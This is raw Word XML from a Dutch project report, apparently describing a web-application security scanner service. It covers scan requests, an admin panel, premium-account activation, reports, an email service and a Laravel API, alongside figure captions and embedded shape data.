                    <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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99"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="577E0583" w14:textId="3A1755E7" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Er kan een alternatieve E-mail mee worden verzonden i.p.v. de standaard </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">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0E3238" w:rsidRDefault="000E3238">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0"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BwkypPeQIAAGYFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBR2THV3QAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="289E2B3E" w14:textId="1EDF1CD8" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Figuur 5.3</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00730594">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF123C1" w14:textId="0459E132" w:rsidR="00E30D45" w:rsidRPr="00726BA6" w:rsidRDefault="007E550D" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc496292459"/>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93">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AF84E"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23233C">
        <w:t>Scan aanvraag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>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0E3238" w:rsidRDefault="000E3238">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tnG4sCAACPBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxMxEL4j8R8s3+kmaUpI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eTMWdO&#10;WGzSs2oT+wwtIx5WqPFxhsAnj9DUogA7vedHZFLirQ6W/pgSQznWeneoL5mTyBxNzgcXAxRJlA2n&#10;59Pp6IL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YXk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DYy2cbiwIAAI8FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQDF5HuH4AAAAAoBAAAPAAAAAAAAAAAAAAAAAOMEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="63567964" w14:textId="2676D35E" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"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Cm44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j6dDZ1fQb3HgfDQLVVw/Fph125YiPfM4xZh&#10;o/EyxDv8SA1NRaGnKNmA//MWP+njcKOUkga3sqLh95Z5QYn+bnHsv4wnk7TG+TGZnpb48MeS1bHE&#10;bs0lYOfHeIMcz2TSj3ogpQfzhAdkmaKiiFmOsSsaB/IydrcCDxAXy2VWwsV1LN7YB8eT64RzmsnH&#10;9ol51w9uxJG/hWF/2fzV/Ha6ydLCchtBqjzcCekO1b4DuPR5YPsDla7K8TtrvZzRxTM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hIRCm44CAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAFKMFAeEAAAALAQAADwAAAAAAAAAAAAAAAADmBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E1DD0B3" w14:textId="2AF5C527" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00325408" w:rsidRDefault="000E3238">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3"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f3JKo48CAACPBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAq6yJBuAAAAAKAQAADwAAAAAAAAAAAAAAAADnBAAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAPQFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="055A040C" w14:textId="08E53EE8" w:rsidR="000E3238" w:rsidRPr="00325408" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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4"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2D4C57D7" w14:textId="0E5556FB" w:rsidR="000E3238" w:rsidRDefault="000E3238">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94">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95">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0E3238" w:rsidRDefault="000E3238" w:rsidP="0043602E">
                            <w:pPr>
                              <w:ind w:left="708" w:firstLine="708"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 5.5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="000E3238" w:rsidRDefault="000E3238"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5"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o6HwCAABm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yhXo6HwCAABmBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAxswcNt4AAAAK&#10;AQAADwAAAAAAAAAAAAAAAADUBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6179288E" w14:textId="1A85E70B" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0043602E">
                      <w:pPr>
                        <w:ind w:left="708" w:firstLine="708"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 5.5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E21CAF1" w14:textId="76B193B6" w:rsidR="000E3238" w:rsidRDefault="000E3238"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6">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241096">
          <w:headerReference w:type="first" r:id="rId97"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="51" w:name="_Toc496292460"/>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F38D"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AB1EE1">
        <w:t>Admin Paneel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="716628BD" w14:textId="77777777" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00311403"/>
    <w:p w14:paraId="7735C821" w14:textId="03B36F34" w:rsidR="003F7243" w:rsidRDefault="003F7243" w:rsidP="00562D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc496292461"/>
      <w:r>
        <w:t>Account Activatie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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0E3238" w:rsidRDefault="000E3238">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6"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17CDA4F0" w14:textId="7C29A66C" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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7"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7CDBEECD" w14:textId="6A6E1BFB" w:rsidR="000E3238" w:rsidRDefault="000E3238">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8">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0E3238" w:rsidRDefault="000E3238"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08"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Cn0d53jQIAAI8FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQD8N8WF4QAAAA0BAAAPAAAAAAAAAAAAAAAAAOUEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="71DDF4D4" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00311403">
                      <w:r>
                        <w:t>Na de betaling activeert de administrator het premiumaccount door op de knop “</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>inactive</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preser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9">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0E3238" w:rsidRPr="00656882" w:rsidRDefault="000E3238"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09"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="07B2CFE3" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00656882" w:rsidRDefault="000E3238" w:rsidP="00311403">
                      <w:r>
                        <w:t>Dit</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00656882">
                        <w:t xml:space="preserve"> is het </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00656882">
                        <w:t>Admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00656882">
                        <w:t xml:space="preserve">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23D67159" w:rsidR="004D0768" w:rsidRDefault="004D0768" w:rsidP="004D0768"/>
    <w:bookmarkStart w:id="53" w:name="_Toc496292462"/>
    <w:p w14:paraId="033E4126" w14:textId="1B91A948"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ACAF"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bookmarkEnd w:id="53"/>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0E3238" w:rsidRDefault="000E3238">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0"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5567A364" w14:textId="5F496AFD" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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1"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="21509A5E" w14:textId="4C3DF569" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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2"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5nX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2Bc5nXgCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAA+4OL98AAAAMAQAA&#10;DwAAAAAAAAAAAAAAAADQBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="26678F8B" w14:textId="2152B2D4" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="007C19DC" w:rsidRDefault="000E3238">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3"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iO4I8owCAACMBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAuL+6DeAAAAAKAQAADwAAAAAAAAAAAAAAAADkBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="639E9759" w14:textId="15AD5FC2" w:rsidR="000E3238" w:rsidRPr="007C19DC" w:rsidRDefault="000E3238">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600A1B62" w:rsidR="00256686" w:rsidRDefault="008720A4" w:rsidP="00ED05B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="54" w:name="_Toc496292463"/>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5D615B08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>22860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0E3238" w:rsidRDefault="000E3238">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4" type="#_x0000_t202" style="position:absolute;margin-left:-2pt;margin-top:18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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4F413C4C" w14:textId="6D392493" w:rsidR="000E3238" w:rsidRDefault="000E3238">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3650D"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t>Rapport</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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0E3238" w:rsidRDefault="000E3238">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5"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7926F049" w14:textId="0592CA99" w:rsidR="000E3238" w:rsidRDefault="000E3238">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636A5"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28D5CCB3" w:rsidR="00997F2E" w:rsidRDefault="00B26A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253075456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CC35892" wp14:editId="7722E39F">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104">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t>Pagina 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFE8FD" w14:textId="2D1AC5CC" w:rsidR="00997F2E" w:rsidRDefault="00C91600">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253221888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18C4E45F" wp14:editId="73ED655C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-93980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>487299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0E3238" w:rsidRDefault="000E3238">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6" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.4pt;margin-top:383.7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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5A1C46FC" w14:textId="3B43B78F" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Figuur 5.13</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242547E" w14:textId="77777777" w:rsidR="00A6372D" w:rsidRDefault="00A6372D">
      <w:pPr>
        <w:sectPr w:rsidR="00A6372D" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId105"/>
          <w:headerReference w:type="first" r:id="rId106"/>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E01B0"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77777777" w:rsidR="00A83B83" w:rsidRDefault="00A83B83" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc496292464"/>
      <w:r>
        <w:t>E-mail Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>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0E3238" w:rsidRDefault="000E3238">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7"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1568ED0D" w14:textId="3B898F0A" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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18"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AyP3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W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AJkDI/eQIAAGYFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAf3fIy3QAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4D834E58" w14:textId="3926FFD6" w:rsidR="000E3238" w:rsidRDefault="000E3238">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8">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bookmarkStart w:id="56" w:name="_Toc496292465"/>
    <w:p w14:paraId="7AC1B8A7" w14:textId="0CD0C2FD" w:rsidR="008B11A9" w:rsidRDefault="00F03C4F" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>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0E3238" w:rsidRDefault="000E3238">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19"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kXX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DodOrqCakeNDtAtS/TyqqZuXIuIdyLQdlADaePxlj7aQFNy6CnO1hB+/Y2f&#10;8DS0JOWsoW0refy5EUFxZr46GufT8WyW1jM/ZsefJvQIh5LVocRt7AVQX2hgKbpMJjyagdQB7CMd&#10;hmXySiLhJPkuOQ7kBXY3gA6LVMtlBtFCeoHX7t7LZDrVOc3aQ/sogu8HEmmUb2DYSzF/NZcdNmk6&#10;WG4QdJ2HNlW6q2rfAVrmPPb94UnX4vCdUS/ncfEM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XzYkXXkCAABmBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAp/7xXN4AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="052F304C" w14:textId="174645FB" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Figuur 5.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="54D52F81" w14:textId="77777777" w:rsidR="008B11A9" w:rsidRDefault="008B11A9">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41B777" w14:textId="1ACE4F81" w:rsidR="00677E26" w:rsidRDefault="00F03C4F" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253224960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77CCBAE3" wp14:editId="535D30E5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3774440</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0E3238" w:rsidRDefault="000E3238">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0" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:297.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0873FB16" w14:textId="29314A18" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Figuur 5.16</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00620F06">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>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9ED6E"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241096">
          <w:headerReference w:type="default" r:id="rId110"/>
          <w:headerReference w:type="first" r:id="rId111"/>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BA251"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7C361006" w:rsidR="00C26333" w:rsidRDefault="008B186E" w:rsidP="008B186E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc496292466"/>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>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0E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00170467" w:rsidRDefault="000E3238">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1"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="792FF00C" w14:textId="3215D320" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve">Voor de </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t>API gebruik</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve"> ik de Routing functionaliteiten van </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t>Laravel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t>.</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w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>routes.php</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17F34899" w14:textId="3F1905EE" w:rsidR="000E3238" w:rsidRPr="00170467" w:rsidRDefault="000E3238">
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve">De API is opgebouwd uit Routes en Controllers en is operationeel op de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t>Artisan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00170467">
                        <w:t xml:space="preserve">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0E3238" w:rsidRDefault="000E3238">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2"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0AkXoCAABm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DhXQCRegIAAGYFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQClHcjY3AAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AE7A2CB" w14:textId="4DC1840C" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00090D9E" w:rsidRDefault="000E3238">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3"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="27C0B0B6" w14:textId="0C52BFC4" w:rsidR="000E3238" w:rsidRPr="00090D9E" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00B86D2F" w:rsidRDefault="000E3238"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4"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" fillcolor="#bdd6ee [1304]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DF0E416" w14:textId="32D126F1" w:rsidR="000E3238" w:rsidRPr="00B86D2F" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00EC73E2" w:rsidRDefault="000E3238"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5"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" fillcolor="#ed7d31 [3205]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D59023A" w14:textId="1DD31DDC" w:rsidR="000E3238" w:rsidRPr="00EC73E2" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00EC73E2" w:rsidRDefault="000E3238"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6"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BSQCRsiQIAAJIFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQBWD/Zn3wAAAAsBAAAPAAAAAAAAAAAAAAAAAOEEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" fillcolor="#5b9bd5 [3208]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77C6C265" w14:textId="2E00DBD1" w:rsidR="000E3238" w:rsidRPr="00EC73E2" w:rsidRDefault="000E3238"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A2478"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7"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ocGlQHoCAABmBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA8q5n2d0AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="538BCF71" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"/>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0E3238" w:rsidRPr="00957BFC" w:rsidRDefault="000E3238">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Dit stukje javascript code is voor het activeren van een premiumaccount. De </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId112"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28"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6E9CB50D" w14:textId="670E32AB" w:rsidR="000E3238" w:rsidRPr="00957BFC" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Dit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>stukje</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>javascript</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> code is </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>voor</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> het </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>activere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premiumaccount</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">. De </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId113"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0E3238" w:rsidRDefault="000E3238">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29"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BhmlnNegIAAGYFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDyvftw3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51F7CA22" w14:textId="5E734353" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Figuur 5.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCE999" w14:textId="237FC173" w:rsidR="004C751F" w:rsidRDefault="00D041CD" w:rsidP="008B186E">
      <w:pPr>
        <w:sectPr w:rsidR="004C751F" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId115"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="58" w:name="_Toc496292467"/>
    <w:p w14:paraId="276887F4" w14:textId="7980F28C"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BE5F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163804">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>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0E3238" w:rsidRDefault="000E3238">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0"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AQgS3hjQIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQCX2dtq3gAAAAkBAAAPAAAAAAAAAAAAAAAAAOUEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
